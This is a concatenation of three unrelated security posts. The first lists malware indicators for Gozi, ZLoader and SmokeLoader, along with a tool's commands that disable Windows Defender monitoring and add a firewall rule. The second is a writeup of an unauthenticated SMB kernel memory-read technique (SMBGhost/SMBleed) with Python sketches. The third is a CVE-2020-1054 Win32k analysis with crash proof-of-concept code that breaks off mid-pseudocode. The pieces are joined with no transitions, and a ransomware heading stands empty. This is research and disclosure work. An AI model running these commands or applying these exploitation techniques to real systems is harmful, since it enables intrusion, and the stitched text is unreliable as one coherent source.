List of metadata extracted from Gozi ISFB v3 samples

Bot version 3.00.854
RSA key 00040000C3DC07D4E1AC941077214371F45B5FDDDF389654D0851D66809BC989ABA850C27D3718D195EE1388087F21FFE759184C185959D1AB5DBC40C3D94C88F46FE8AA1CA94CB07CF110866559456F9DF6F1EAE9C3002F1A257A2F99E3EB3EF6C727516BA65CE56C82E23CBBE87E1EE95F34DD7DC0D07B7C1F57B71BC49DC35DEB2CAB0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010001
Group IDs 202004081
202004091
202004141
202004231
202005041
80000
Serpent keys 1qzRaTGYO5dpREYI
8JbpEEfNYPlYoAN4
dLwZ7QwI57AkzZEl
UEwFH6L9iBbdJxAf
uIIXQ4B05dT8AytD
vuARb2EPotEtfAX2
Z6fiC4XCvQmfkgua
C&Cs hxxps://devicelease.xyz
hxxps://guiapocos.xyz
hxxps://ludwoodgroup.xyz
hxxps://respondcritique.xyz
hxxps://triomigratio.xyz
hxxps://uplandcaraudio.xyz
hxxps://woofwoofacademy.xyz

ZLoader (MD5: fb95561e8ed7289d015e945ad470e6db)

RC4 key das32hfkAN3R2TCS
Botnet name pref
Nonce 0x7
Static config RC4 key kyqvkjlpclbcnagbhiwo
Version 1.2.22.0
C&Cs hxxp://advokat-hodonin.info/gate.php
hxxp://penaz.info/gate.php
Binary Distribution hxxp://paiolets.com/install.exe

Netwalker ransomware (MD5: 198b2443827f771f216cd8463c25c5d8)

SmokeLoader (MD5: 2143d279be8d1bb4110b7ebe8dc3afbc)

RC4 send 0x69A84992
RC4 recv 0x5D7C6D5B
C&Cs hxxp://flablenitev.site/index.php
hxxp://lendojekam.xyz/index.php
hxxp://lgrarcosbann.club/index.php
hxxp://lpequdeliren.fun/index.php
hxxp://transvil2.xyz/index.php
Binary Distribution hxxps://szn.services/1.exe
hxxps://utenti.info/1.exe
hxxps://utenti.live/1.exe

SecTool checker (MD5: b33753fae7bd1e68e0b1cc712b5fb867)

We have found a sample crypted by the CryptOne crypter as used by WastedLocker, which is capable of detecting/disabling a list of security software. It is believed that this tool is used during ransomware deployment, but we have no specific evidence that it was used by Evil Corp. However, in the past we have seen execution of commands listed in the tool to disable Microsoft Windows Defender.

List of Registry Keys checked Software\ESET
SYSTEM\ControlSet001\Services\MBAMService
List of Mutex checked 00082fbb-a419-43f4-bd80-e3631ebbf4c8
069e4409-bd54-4a1f-8e37-49da2cf6a537
0ca9a8d3-01bf-4f9e-bfc7-7eb51e67e0c4
12a2c0fc-00d2-4614-b4ae-c18eb500a088
138be83c-2a52-4c31-9ee8-bfd4eac53d72
15417794-7485-46f6-9965-d34730ea0f48
168cb052-69eb-45be-be07-d4f323dc67d6
16ed8dab-ee6b-44ea-8cea-31c66d6864b9
172821eb-729d-4307-a56f-63063b2677de
17689d7a-89bf-4e2a-a49c-9e4e5a51a9d7
197a1689-8bb1-4fcd-80e9-32b86e3751f5
1a379834-6135-41e7-9cf7-e79a9f705fbc
1cce886d-1841-4e18-963b-15f2e90a3c44
1e8e5806-2e99-4002-b62c-7a78a6641874
1f1769de-42fa-4883-b37c-f0de488de557
240187f4-b097-4a3c-a6fa-2ca5b1e0b373
25f07256-3b46-4531-aa3e-e1729d9aa7cb
274f61dd-3fed-4bfe-9aa6-8a012339a41f
27a0f05f-41fa-43f1-86b9-7e48bde3d716
2a942be2-9252-4d60-9483-3651a92192a5
2c0c5f0d-6ad7-4c97-b1a8-2c706d03a4f8
39309b80-cef5-4ce1-b215-0719723c4c30
3c159c86-0e90-47d1-ad37-788c00ba2948
3f78ca48-011c-4ffb-abfa-c9f659e4a820
3ffd4715-4991-4bc8-9c51-2e3aeb6e737e
3G1S91V5ZA5fB56W
48353b4f-51f9-4961-bcc1-c8d5163a8978
4d6a57e9-e692-4da2-8ba8-adb25645e4b8
4e1ac580-d3cf-4961-81eb-072dff249c17
4e5e7d5e-a1fe-4de7-ad53-5f4aaecd7402
55731fe5-97ad-47dc-953f-37a8aca1451b
5962654a-a395-4714-96f2-2419ab2172bf
5e76294a-2787-4ae2-9ddc-b792b0c45ec2
60f8896b-a437-4e79-9e29-96522ca88c4c
62e64ec9-d662-4595-bf77-634764dcf810
67f4e0eb-54cc-4779-b3c3-fe277c8478ae
6b264507-ba91-4d85-86c9-1e827315cbe0
722cbc3c-acc8-4296-a8dd-7d06e5ca7d57
7eb5ccec-3fd7-4826-b681-02a6129aa108
81baf7c7-3010-49b9-9f56-d53fca06c04d
85e6784c-7904-41ee-99b4-8b286e19da70
8AZB70HDFK0WOZIZ
8f1a37f6-9cff-447e-a00c-cb19512de134
9b765102-98e7-43e2-a003-f8cbdfab8a64
9f093bf8-480b-414c-a8e8-5d9c6da83576
9f7e0dc2-bc5c-497e-aa70-f8072e71550c
ab7d92f2-968a-461e-9da6-e569dedb0a91
ARScenes
ASUSNet20
ATYNKAJP30Z9AQ
b22d1dd8-e3ea-4764-ba9b-0ebf41fddee7
b3e32042-d969-43d1-b20c-bcf8da5ba436
beb41e13-5e33-450f-a9c5-3e5a382d224d
BiosChecksumChecker
bitcoreguard
BlueEye
c3c2a8b3-fc8a-4fe3-8f24-6f2a757a5012
ca1b68fd-56d5-4355-94b2-ed6ab0857890
CBKZiOPASRHKL
CDNetStreamer2.r05
cf3573d5-bf4f-4094-bbea-ced8efde2257
China1839099
China4150039
CryptoMaxima
D1JozWrldD
d86a1229-2cb7-409b-a3de-5366eec3db90
d8ba5865-ac00-4df1-8437-eb144077e031
dad17f2e-5f30-4313-b1c3-5ae8c2149757
dec0f5aa-1fd1-458f-916c-693887610891
e3024a8f-3f2b-4e06-ac36-0997c1090d00
ed3a7d1d-ed6f-4c8f-86d4-44dcde3b32f8
f1e7974a-30e1-423c-9745-bbb7ff7dbf71
f378f238-6503-4544-8e43-cbe4bbf3615e
f967041f-20dd-4d31-a34a-f5e04bdfdf7b
FamilyWeekend
fbac80bd-ba6a-4cd5-92d9-3a31a87f7af6
fda765a3-b5a2-4417-9097-3b18dc6fe6fb
fe711d65-f31a-4c22-a12f-cec65d231941
FixLCD
FMPsDSCV0l
FoloDrite
Hk4kKLL0ZAF8a
HTTPBalancer_v2.15
I0N8129AZR1A
ImageCreator_v4.2
InRAMQueue
IntelBIOSReader
IwS01003993
JerkPatrol
JKLSXX1ZA1QRLER
KDOWEtRVAB
LenovoSuite
MaverickMeerkat
MDISequencer
MK5Cheats
MLIXNJ9AEGPSE
MLIXNJAEGPSE
MovieFinder
N800HANOI
NattyNarwhal
NeoNetPlasma
NeonRhythmbox
NetRegistry
NetworkLighter
NHO9AZB7HDK0WAZMM
NMOZAQcxzER
NNDRIOZ8933
OMXBJSJ3WA1ZIN
OneiricOcelot
OnlineShopFinder
P79zA00FfF3
PCV5ATULCN
PJOQT7WD1SAOM
PrecisePangolin
PSHZ73VLLOAFB
QOSUser2.r10
QuantalQuetzal
RaringRingtail
RaspberryManualViewer
RedParrot
RouteMatrix
SoloWrite
sqlcasheddbm
SSDOptimizerV13
StreamCoder1.0
Tropic819331
UEFIConfig
UtopicUnicorn
VHO9AZB7HDK0WAZMM
VideoBind
VirginPoint
VirtualDesktopKeeper
VirtualPrinterDriver
VividVervet
VRK1AlIXBJDA5U3A
WinDuplicity
WireDefender
wwallmutex
Commands executed C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll
 
C:\Windows\System32\netsh.exe advfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"

SMBleedingGhost Writeup Part II: Unauthenticated Memory Read – Preparing the Ground for an RCE

15 June 2020 at 17:06

Introduction

In our previous blog post, we demonstrated how the SMBGhost bug (CVE-2020-0796) can be exploited for local privilege escalation. A brief reminder: CVE-2020-0796, also known as “SMBGhost”, is a bug in the compression mechanism of SMBv3.1.1. The bug affects Windows 10 versions 1903 and 1909, and it was announced and patched by Microsoft about 3 months ago. In the previous blog post we mentioned that although the Microsoft Security Advisory describes the bug as a Remote Code Execution (RCE) vulnerability, there is no public POC that demonstrates RCE through this bug. This was true until chompie1337 released the first public RCE POC, based on the writeup of Ricerca Security. Our POC uses a different method, and doesn’t involve physical memory access. Instead, we use the SMBleed (CVE-2020-1206) bug to help with the exploitation.

Aiming for RCE

Our previous research led to the local privilege escalation attack that we showed in our previous writeup. SMBGhost can also be used for an RCE attack, and we aim to demonstrate how we achieved it in this series of blog posts. As we showed in the previous writeup, we were able to implement a remote write-what-where primitive. However, for an RCE capability we need to know where to write the arbitrary data. Since most of the memory layout in modern Windows versions is randomized, having the ability to write arbitrary data in any location is still very limiting. While searching for another capability to assist with the attack, we discovered a new bug in Microsoft’s SMB implementation. For technical details and a POC, check out our recent publication. We named it SMBleed since it allows leaking parts of memory remotely, similar to Heartbleed, just via SMB. While the concept is similar and an authenticated user can read large blocks of uninitialized data, the attack surface without authentication is more limited. Since we aimed for unauthenticated RCE exploitation, the first thing we looked for was a way to read memory without authentication.

Diving into SMB

Note: The following sections describe in detail a technique we were able to use for exploitation, but dumped in favor of a different approach which worked better in our case. Still, it’s an approach that we felt is worth sharing. If you prefer to stick to what ended up in our final POC, you can just read Observation #1 and Observation #2, and then skip to the A different approach – decompression section.

The SMBleed bug allows an attacker to send a message such that its beginning is controlled by the attacker, while the rest of the message contains uninitialized data which is treated as a part of the message. For an authenticated user, there’s an easy way to exploit this using the SMB2 WRITE message to write uninitialized data to a file, and then read it with the SMB2 READ command. We started by looking for a similar technique for an unauthenticated user – a way to send a message such that a part of it can be retrieved later.

After skimming over the protocol specification and debugging a couple of sessions, we saw that a regular flow begins with the following commands that are sent by the client:

SMB2 NEGOTIATE → SMB2 SESSION_SETUP → SMB2 SESSION_SETUP

If incorrect credentials are used, the session is aborted after the second SMB2 SESSION_SETUP request.

We assume that we don’t have valid credentials, so we checked whether other commands can be sent without authentication. We found the following after some experimentation:

  • The first command to be sent must be SMB2 NEGOTIATE. It also must be the only SMB2 NEGOTIATE command during the session.
  • The subsequent commands, until authentication completes successfully, must be SMB2 SESSION_SETUP. The exception is when anonymous access to named pipes or shares is allowed, but it is restricted by default.

Since the SMB2 NEGOTIATE message is not compressed (the compression algorithm, if any, is decided during the negotiation), all that’s left is SMB2 SESSION_SETUP. So we took a closer look at the format of the SMB2 SESSION_SETUP message, hoping to find a way to get some of the data that is being sent back.

A closer look at SMB2 SESSION_SETUP

As we’ve already mentioned, a regular session that we observed sends two SMB2 SESSION_SETUP commands. At first, we checked whether one of the replies to these messages sends back some of the data. If that was the case, we could try to craft a message such that the data is left uninitialized. Unfortunately, we didn’t find such data. We couldn’t find a way to affect the first response, and the second response had an empty body and the 0xC000006D (STATUS_LOGON_FAILURE) status in the packet header (remember, we assume we don’t have valid credentials). The first SMB2 SESSION_SETUP request contains an NTLM Negotiate message, and the second SMB2 SESSION_SETUP request contains an NTLM Authenticate message. The former is rather simple, and we weren’t able to use it for something interesting, so we focused on the latter.

The NTLM Authenticate message

After studying the NTLM Authenticate message we came to the conclusion that the message’s most complex part, which is the best fit for misuse, is the NTLMv2 Response structure. It’s a variable-length byte array, mostly consisting of the NTLMv2_CLIENT_CHALLENGE structure. We noticed that if the structure doesn’t pass some of the initial checks, the 0xC000000D (STATUS_INVALID_PARAMETER) status is returned instead of 0xC000006D (STATUS_LOGON_FAILURE). Some of these checks verify the AvPairs field.

The AvPairs field is a variable-length byte array that contains a sequence of AV_PAIR structures. Each AV_PAIR structure defines an attribute/value pair. The attribute is defined by the AvId field, the AvLen field defines the value’s length in bytes, and the Value field is a variable-length byte-array that contains the value itself. An item with the attribute MsvAvEOL and a zero length marks the end of the array.
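To make the layout concrete, here is a minimal Python sketch that builds and parses an AvPairs byte array. AvId and AvLen are 16-bit little-endian fields; the function names are our own, and the parser's choice to stop when a length runs past the buffer is a simplification made for this sketch.

```python
import struct

MSV_AV_EOL = 0x0000
MSV_AV_NB_COMPUTER_NAME = 0x0001
MSV_AV_NB_DOMAIN_NAME = 0x0002

def build_av_pair(av_id, value):
    """Serialize one AV_PAIR: AvId, AvLen, then the value bytes."""
    return struct.pack("<HH", av_id, len(value)) + value

def parse_av_pairs(data):
    """Return a list of (AvId, value) tuples, stopping at MsvAvEOL."""
    pairs = []
    offset = 0
    while offset + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, offset)
        offset += 4
        if av_id == MSV_AV_EOL and av_len == 0:
            break  # terminator item
        if offset + av_len > len(data):
            break  # declared length runs past the buffer
        pairs.append((av_id, data[offset:offset + av_len]))
        offset += av_len
    return pairs

blob = (build_av_pair(MSV_AV_NB_COMPUTER_NAME, "HOST".encode("utf-16-le"))
        + build_av_pair(MSV_AV_NB_DOMAIN_NAME, "DOM".encode("utf-16-le"))
        + build_av_pair(MSV_AV_EOL, b""))
for av_id, value in parse_av_pairs(blob):
    print(hex(av_id), value.decode("utf-16-le"))
```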

AvPairs inside the SMB2 packet.

The authentication message is handled by the SsprHandleAuthenticateMessage function in the msv1_0.dll module. Among the initial checks, the function makes sure that the AvPairs array contains the following attributes: 0x0001 (MsvAvNbComputerName), 0x0002 (MsvAvNbDomainName). The value is not checked. The check itself is done by traversing the array and checking whether the requested attribute exists, and whether its length is within the struct. If the length is too large, the traversal is stopped. So practically, the MsvAvEOL item is not required for the NTLM Authenticate message to be valid.

At this point we figured that we can craft a request that can provide an answer to the following question: Given two bytes at offset x, interpreted as uint16, is the value larger than y? x and y are controlled by us. Consider the following packet:

The content of value 0x0001 (MsvAvNbComputerName) doesn’t matter, so we can use it to adjust the offset of the second value. For the second value, we only set the attribute as 0x0002 (MsvAvNbDomainName), leaving the length and the value uninitialized. We also set the size of the whole packet so that there are y bytes that follow the length field. There are two possible outcomes depending on the uninitialized value of the length field of the second value:

  • length <= y: In this case the check passes, since a valid 0x0002 (MsvAvNbDomainName) value is found. The server returns 0xC000006D (STATUS_LOGON_FAILURE) since the credentials are incorrect.
  • length > y: In this case the check fails, since the second value has an invalid length and is discarded. The server returns 0xC000000D (STATUS_INVALID_PARAMETER) for this case.

According to the server response we can deduce the answer to our question.
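The two outcomes can be reproduced offline with a simplified model of the check. The Python sketch below is not the msv1_0.dll logic; it only mimics the behaviour described above (traverse the array, stop if a length is too large, require attributes 0x0001 and 0x0002). The function names are hypothetical, and the stale length that would come from uninitialized memory is passed in explicitly.

```python
import struct

STATUS_LOGON_FAILURE = 0xC000006D
STATUS_INVALID_PARAMETER = 0xC000000D

def has_attribute(av_pairs, wanted_id):
    """Traverse the array; give up as soon as a length exceeds the buffer."""
    offset = 0
    while offset + 4 <= len(av_pairs):
        av_id, av_len = struct.unpack_from("<HH", av_pairs, offset)
        offset += 4
        if offset + av_len > len(av_pairs):
            return False  # length too large: traversal stops
        if av_id == wanted_id:
            return True
        offset += av_len
    return False

def simulated_status(av_pairs):
    """Model of the server reply for a client without valid credentials."""
    if has_attribute(av_pairs, 0x0001) and has_attribute(av_pairs, 0x0002):
        return STATUS_LOGON_FAILURE
    return STATUS_INVALID_PARAMETER

def probe(stale_length, y):
    """Second item has only its attribute set by us; y bytes follow its length field."""
    first = struct.pack("<HH", 0x0001, 0)
    second = struct.pack("<HH", 0x0002, stale_length)
    return simulated_status(first + second + bytes(y))

print(hex(probe(stale_length=5, y=8)))  # 0xc000006d, since length <= y
print(hex(probe(stale_length=9, y=8)))  # 0xc000000d, since length > y
```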

So, now we can get this small piece of information, right? Not so fast. Unfortunately, the NTLM Authenticate message is limited to 0xB48 bytes, and is discarded if it’s larger than that. The check is done by the SspContextGetMessage function in the msv1_0.dll module. Can we solve this problem by leaving only one of the two length bytes uninitialized? Unfortunately not, since the uint16 value is encoded as little endian, and to the best of our knowledge at this point, we can only leave the second, most significant byte uninitialized, which doesn’t help much. Unable to achieve something better within a single SMB session, we looked at what else can be done.

Observation #1: Lookaside lists

As we already mentioned in our previous research, the modules that handle SMB in the kernel (srv2.sys and srvnet.sys) use a custom allocation function, SrvNetAllocateBuffer, exported by srvnet.sys. This function uses lookaside lists for small allocations as an optimization. Lookaside lists are used for effectively reserving a set of reusable, fixed-size buffers for the driver.

The lookaside lists are created upon initialization, a list for each size and logical processor, as depicted in the following table:

→ Allocation size

Logical Processor
0x1100 0x2100 0x4100 0x8100 0x10100 0x20100 0x40100 0x80100 0x100100
Processor 1 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor 2 📝 📝 📝 📝 📝 📝 📝 📝 📝
Processor n 📝 📝 📝 📝 📝 📝 📝 📝 📝

Each cell with the “📝” symbol is a separate lookaside list. To simplify our analysis, we’ll assume our target has only one logical processor (we’ll cover targets with more than one logical processor in the third part of the writeup). In this case, as long as the same amount of bytes is allocated, the same lookaside list is used, and the same allocated buffer is reused again and again. We can use this implementation detail to have some control over the uninitialized data, as we’ll see soon.
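The reuse behaviour can be pictured with a toy model in Python. This is not how SrvNetAllocateBuffer is implemented: the class below is hypothetical, it models a single logical processor, and it assumes that a request is served from the smallest list whose buffer size fits. The point is only that a buffer returned to a list comes back later with its old contents intact.

```python
class LookasideSim:
    """Toy model of per-size lookaside lists on one logical processor."""

    SIZES = [0x1100, 0x2100, 0x4100, 0x8100, 0x10100,
             0x20100, 0x40100, 0x80100, 0x100100]

    def __init__(self):
        self.free = {size: [] for size in self.SIZES}

    def size_class(self, requested):
        # Assumption: the smallest list that fits the request is chosen.
        for size in self.SIZES:
            if requested <= size:
                return size
        raise ValueError("too large for a lookaside list")

    def allocate(self, requested):
        size = self.size_class(requested)
        if self.free[size]:
            return size, self.free[size].pop()  # reused as-is, not zeroed
        return size, bytearray(size)

    def release(self, size, buf):
        self.free[size].append(buf)

sim = LookasideSim()
size, buf = sim.allocate(0x1000)
buf[0x200:0x204] = b"LEAK"           # data left behind by the first request
sim.release(size, buf)
size2, buf2 = sim.allocate(0x0F00)   # a different size, but the same list
print(size2 == size, bytes(buf2[0x200:0x204]))
```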

Observation #2: Failing the decompression

Let’s revisit what happens when a compressed packet is decompressed (refer to our previous research for more details and pseudocode):

In case CompressedData is invalid, the decompression stage fails, the copy stage is not executed, and the connection is dropped. But the decompression might fail only after extracting a part of CompressedData which is valid. This allows us to craft a request such that data of our choice will be written at an offset of our choice, like this:

Back to the NTLM Authenticate message

We can use the above observations to make our technique work by using two steps:

  1. Send a message with an invalid compressed data such that only a single zero byte is extracted. That byte will be the most significant byte of the length of the second value in the AvPairs array.
  2. Send a message just as before, but make sure that the same lookaside list is used for the allocation, so that the zero byte will be there.

This time, this technique can answer the following question: Given a byte at offset x, is the value larger than y? As before, x and y are controlled by us.

Since we can re-use the buffer again and again by making sure the same lookaside list is used, we can repeat the steps several times while changing y, and finally deduce the byte value at a given offset.
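Repeating the question while changing y amounts to a binary search over the 256 possible byte values. The sketch below assumes a hypothetical callable, is_greater_than(y), that stands in for one round trip to the target (both steps above) and returns True when the byte at the chosen offset is larger than y. It is not taken from the POC script.

```python
def recover_byte(is_greater_than):
    """Recover a byte value using only 'is the value larger than y?' queries."""
    lo, hi = 0, 255
    while lo < hi:
        mid = (lo + hi) // 2
        if is_greater_than(mid):
            lo = mid + 1   # value is in (mid, hi]
        else:
            hi = mid       # value is in [lo, mid]
    return lo


# Local stand-in for the remote oracle, counting how many queries are needed.
secret = 0xA7
queries = []

def fake_oracle(y):
    queries.append(y)
    return secret > y

print(hex(recover_byte(fake_oracle)), len(queries))  # 0xa7 8
```

Under these assumptions each byte costs eight queries, regardless of its value.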

Unfortunately, this technique has a limitation – the offset of the byte we can read is limited to 0xADB bytes from the beginning of the packet buffer. That’s because the offset of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0x40 bytes after the end of the SMB2 SESSION_SETUP headers (enforced by the Smb2ValidateSessionSetup function in srv2.sys), and the size of the NTLM Authenticate message (AUTHENTICATE_MESSAGE) is limited to 0xB48 bytes, as we already mentioned.

Overcoming the offset limitation

Let’s say that we want to read a byte at offset 0x1100 (we’ll see why we want to go that far in the third part of the writeup). We can’t do it directly with our technique, but we found the following solution: since the buffers get reused from the lookaside lists, we can “lift up” the target byte via the decompression function by setting the Offset field to point beyond that byte. We just need to make sure that the data that is located there can be interpreted as valid compressed data, otherwise the copying won’t happen.

The incoming packet buffer contains extra 16 header bytes which aren’t copied over when the decompression takes place. As a result, the copied data, including the target byte, is copied to a location 16 bytes closer to the beginning of the allocated buffer. We can repeat that several times, until the target byte offset is low enough.
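As a rough worked example, the number of "lifts" needed for a given target offset can be estimated as follows. The sketch assumes that every round moves the byte exactly 16 bytes closer and that an offset of exactly 0xADB is still readable; both are simplifications of the description above.

```python
def lifts_needed(target_offset, max_offset=0xADB, step=16):
    """Rounds needed until target_offset drops to max_offset or below."""
    if target_offset <= max_offset:
        return 0
    # Ceiling division without floating point.
    return -(-(target_offset - max_offset) // step)


rounds = lifts_needed(0x1100)
print(rounds, hex(0x1100 - rounds * 16))  # 99 0xad0
```

For the offset 0x1100 used in the text, this gives 99 rounds, which is consistent with the later remark that overcoming the limitation requires a large number of packets.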

Address leak POC

You can find a script that demonstrates the above technique here. Remember that we assumed that the target computer has only one logical processor, so you’ll have to configure your VM properly to get the script working. If all goes well, the script will read and print an address from the NonPagedPoolNx pool. In fact, that would be the address of one of the buffers residing in one of the lookaside lists.

A different approach – decompression

While advancing with our research, we realized that the decompressed SMB packet is not the only complex structure that can be invalid in various ways. Even before handling all of the SMB-related structures, the compressed buffer can be invalid as well. If the decompression fails, the connection is dropped, which can be detected.

Microsoft’s SMB implementation offers three compression algorithms to choose from: LZNT1, Plain LZ77 and LZ77+Huffman. We looked at LZNT1 since it’s the first in the list, and it’s rather simple – about 80 Python lines for a decompression function. Without diving too much into details, the compressed data consists of a sequence of compressed blocks, each beginning with a uint16 variable marking its length. When a length of zero is encountered, the decompression completes (similar to a NULL-terminated string, but it’s optional). Also, conveniently, a range of zero bytes represents valid compressed data. With the above, we managed to answer the same question as we did with the previous approach: Given a byte at offset x, is the value larger than y? Here, too, x and y are controlled by us.
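To make the block structure more concrete, here is a small sketch that walks LZNT1 chunk headers without decompressing anything. It is not the code we used. The bit layout (low 12 bits hold the chunk size minus 3, bit 15 marks a compressed chunk, an all-zero header ends the stream) reflects our reading of the LZNT1 format and should be checked against the MS-XCA specification before relying on it.

```python
import struct


def walk_lznt1_chunks(buf):
    """Return (offset, is_compressed, total_size) for each chunk in buf."""
    chunks = []
    pos = 0
    while pos + 2 <= len(buf):
        (header,) = struct.unpack_from("<H", buf, pos)
        if header == 0:
            break  # a zero header terminates the stream
        total = (header & 0x0FFF) + 3      # size including the 2-byte header
        compressed = bool(header & 0x8000)
        if pos + total > len(buf):
            raise ValueError("chunk at offset %#x runs past the buffer" % pos)
        chunks.append((pos, compressed, total))
        pos += total
    return chunks


# Two made-up chunks followed by a terminating zero header.
sample = (struct.pack("<H", 0xB003) + b"\x00" * 4 +   # compressed, 6 bytes
          struct.pack("<H", 0x3001) + b"ab" +         # uncompressed, 4 bytes
          struct.pack("<H", 0x0000))
print(walk_lznt1_chunks(sample))  # [(0, True, 6), (6, False, 4)]
```

The sketch only shows how a length field decides where the next block header is read from, which is the property the technique relies on.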

We accomplished that by sending a valid packet which is followed by a range of bytes similar to the following (note that it’s a simplification, the actual byte values are a bit different):

There are two possible outcomes depending on the uninitialized value of the least significant byte of the length field:

  • length <= y: In this case the whole compressed block will consist of zero bytes, which is completely valid, and the next block’s length will be zero, completing the decompression successfully. The server will return a response.
  • length > y: In this case, either the first or the second compression block will contain 0xFF bytes, which will fail the decompression. The server will drop the connection.

Just like with the previous technique, we can use observations #1 and #2 to craft a message with an uninitialized byte in the middle of the message by using two steps:

  1. Send a message with invalid compressed data such that only the part we need is extracted. The bytes that will be extracted are the bytes in the image above.
  2. Send a second message, but make sure that the same lookaside list is used for the allocation, so that the bytes from step 1 will be there.

Note that the Offset value in the SMB packet header will point to the compressed data, which can be valid or not depending on the value of the uninitialized byte. The valid SMB packet will be sent uncompressed. Note also that since the Offset value is larger than the message itself, there’s an overflow in the calculation of the compressed data size, which ends up being a huge number. Usually that’s not an issue since the decompression ends quickly, either successfully or not. But sometimes the system crashes due to an out-of-bounds read. We didn’t try to solve this since it happens rarely, and the POC is complex enough.
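The size overflow mentioned above can be illustrated with plain 32-bit arithmetic. The function name and the exact subtraction are assumptions made for illustration. The sketch only shows why an Offset larger than the message yields a huge unsigned size.

```python
def compressed_size_u32(message_len, offset):
    """Model of a 32-bit unsigned 'remaining bytes' calculation."""
    return (message_len - offset) & 0xFFFFFFFF


# Offset within the message: the size is what one would expect.
print(hex(compressed_size_u32(0x100, 0x40)))    # 0xc0
# Offset beyond the message: the subtraction wraps around.
print(hex(compressed_size_u32(0x100, 0x1000)))  # 0xfffff100
```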

The most notable advantage of this technique compared to the previous one is that there’s no offset limitation anymore. Even though we managed to overcome that limitation with the previous technique, doing so required sending a large number of packets, hurting performance and stability.

ZecOps Detection

ZecOps classifies forensic logs related to these issues with the tags #SMBGhost and #SMBleed. You can find more information on how to use ZecOps solutions for Endpoints & Servers, Mobile devices, or applications.

Remediation

You can remediate the impact of both issues by doing one of the following:

  • Apply the latest security updates (recommended)
  • Block port 445 / enforce host isolation
  • Disable SMBv3.1.1 compression

Part II – Summary

In this part, we described how we managed to read uninitialized data from the kernel pool, remotely and without authentication, by exploiting SMBGhost and SMBleed. In the third part we’ll show how it helped us achieve RCE.

CVE-2020-1054 Analysis

15 June 2020 at 14:00

This post is an analysis of the May 2020 security vulnerability identified by CVE-2020-1054. The bug is an elevation of privilege in Win32k. The bug was reported by Netanel Ben-Simon and Yoav Alon from Check Point Research as well as bee13oy of Qihoo 360 Vulcan Team. I highly recommend viewing Netanel and Yoav’s talk from OffensiveCon20 Bugs on the Windshield: Fuzzing the Windows Kernel, which provides insight into how they found this and other bugs.

The remainder of this post will follow the steps I took to analyze the bug and write a proof of concept exploit targeting Windows 7 x64 (fully patched until Microsoft stopped supporting it).


The Crash

Netanel and Yoav kindly provided crash code. This code was a great starting point and I did not do any patch diffing. Patch diffing can still be very useful under these circumstances, however I found it unnecessary in this case.

The provided crash code:

#include <windows.h>

int main(int argc, char *argv[])
{
    LoadLibrary("user32.dll");
    HDC r0 = CreateCompatibleDC(0x0);
    // CPR's original crash code called CreateCompatibleBitmap as follows
    // HBITMAP r1 = CreateCompatibleBitmap(r0, 0x9f42, 0xa);
    // however all following calculations/reversing in this blog will 
    // generally use the below call, unless stated otherwise
    // this only matters if you happen to be following along with WinDbg
    HBITMAP r1 = CreateCompatibleBitmap(r0, 0x51500, 0x100);
    SelectObject(r0, r1);
    DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc, 
        0x0, 0x0, 0x6);

    return 0;
}

Reviewing the documentation for CreateCompatibleBitmap and DrawIconEx is suggested.

My first step was to rewrite the code in Rust and run it on a Windows 7 x64 box. Below is a snippet of the WinDbg bugcheck analysis:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: fffff904c7000240, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff960000a5482, If non-zero, the instruction address which referenced 
    the bad memory address.
Arg4: 0000000000000005, (reserved)

Some register values may be zeroed or incorrect.
rax=fffff900c7000000 rbx=0000000000000000 rcx=fffff904c7000240
rdx=fffff90169dd8f80 rsi=0000000000000000 rdi=0000000000000000
rip=fffff960000a5482 rsp=fffff880028f3be0 rbp=0000000000000000
 r8=00000000000008f0  r9=fffff96000000000 r10=fffff880028f3c40
r11=000000000000000b r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po cy
win32k!vStrWrite01+0x36a:
fffff960`000d5482 418b36   mov esi,dword ptr [r14] ds:00000000`00000000=????????

STACK_TEXT:  
nt!RtlpBreakWithStatusInstruction
nt!KiBugCheckDebugBreak+0x12
nt!KeBugCheck2+0x722
nt!KeBugCheckEx+0x104
nt!MmAccessFault+0x736
nt!KiPageFault+0x35c
win32k!vStrWrite01+0x36a
win32k!EngStretchBltNew+0x171f
win32k!EngStretchBlt+0x800
win32k!EngStretchBltROP+0x64b
win32k!BLTRECORD::bStretch+0x642
win32k!GreStretchBltInternal+0xa43
win32k!BltIcon+0x18f
win32k!DrawIconEx+0x3b7
win32k!NtUserDrawIconEx+0x14d
nt!KiSystemServiceCopyEnd+0x13
USER32!ZwUserDrawIconEx+0xa
USER32!DrawIconEx+0xd9
cve_2020_1054!CACHED_POW10 <PERF> (cve_2020_1054+0x106d)

The crash happens at win32k!vStrWrite01+0x36a on the instruction mov esi,dword ptr [r14]. Setting a breakpoint on this instruction yields the following:

image 1

It is clear that the crash occurs due to an invalid memory reference. This matches the WinDbg bugcheck analysis. Check Point Research tweeted about this vulnerability, describing it as an out-of-bounds (OOB) write.

I will work under the assumption that this value (fffff904'c7000240 in the crash) is what can be controlled for the OOB write. Note that the value c7000240 will be referenced throughout the blog post. This value changes across system reboots and sometimes per program execution; however, for the sake of continuity it will remain the same here.


Controlling OOB Write

The first goal is to understand how the address fffff904'c7000240 can be controlled, which will be referred to as oob_target. To accomplish this, the relevant parts of vStrWrite01 need to be reversed. Working backwards from mov esi,dword ptr [r14], r14 is set with lea r14, [rcx + rax*4]:

image 2

Working further backwards rcx is initialized in one of the first basic blocks of vStrWrite01. After that, rcx is manipulated in a loop:

image 3

A constant value is added to rcx in the loop. In the assembly this is add ecx, eax. A pseudo-code snippet of the loop:

var_64h = 0x7fffffff; 
